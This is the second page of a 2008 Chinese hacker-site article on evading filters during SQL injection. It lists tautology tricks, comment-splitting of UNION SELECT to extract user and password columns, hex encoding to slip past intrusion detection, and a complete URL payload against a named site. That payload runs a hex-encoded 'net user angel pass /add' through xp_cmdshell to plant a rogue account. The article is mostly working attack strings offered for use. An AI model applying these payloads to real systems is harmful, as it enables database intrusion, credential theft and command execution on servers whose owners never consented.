黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑客常识 >> 正文
·网站注入如何绕过限制!05-08·实例讲解跨站入侵攻防战05-08
·rgboard 3.0.12 远程文件05-08·迅雷本地溢出POC05-08
·perl后门,正向和反向05-08·嘉英网提供50-1000M免费05-08
·掌控Vista从控制面板说起05-07·XP系统桌面主题搬家小技05-07
·把Windows 2008 RC1配置05-07·用WinPE备份Windows Vis05-07
·无限网络免费硬盘-易上传05-07·火网数据中心提供30M免费05-07
·新思路用Gene恢复系统管05-06·虫网磁盘100M免费网络硬05-06
·天寻网络提供30-100M免费05-06·Windows Server 2008使用05-05
·51.com提供1000M网络免费05-05·站长扶持计划---站长中国05-05
·WordPress Cookie完整性05-04·WordPress wpSS插件ss_i05-04
·Oblog漏洞五一重现05-04·跨站脚本-攻击和防御指05-04
·两个shellcode05-04·代理工具:CTProxy 1.0 05-04
·强悍挂马工具:IIS_AD I05-04·Windows XP with SP3 VO05-04
·易美网络提供1000M网络免05-04·终点免费空间提供100M免05-04
[推荐]网站注入如何绕过限制!
        ★★★★★

网站注入如何绕过限制!

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-8 11:38:49

8、通过BETWEEN绕过

如  or 'swords' BETWEEN 'rw' AND 'tw'

9、通过>或者<绕过
or 'swords' > 'sw'
or 'swords' < 'tw'
or 1<3

……

10、运用注释语句绕过

用/**/代替空格,如:
UNION /**/ Select /**/user,pwd,from tbluser


用/**/分割敏感词,如:
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser


11、用HEX绕过,一般的IDS都无法检测出来
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
  declare @a sysname
  select @a=
  exec master.dbo.xp_cmdshell @a

效果
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--


其中的
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
就是
“net user angel pass /add”
的意思。

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886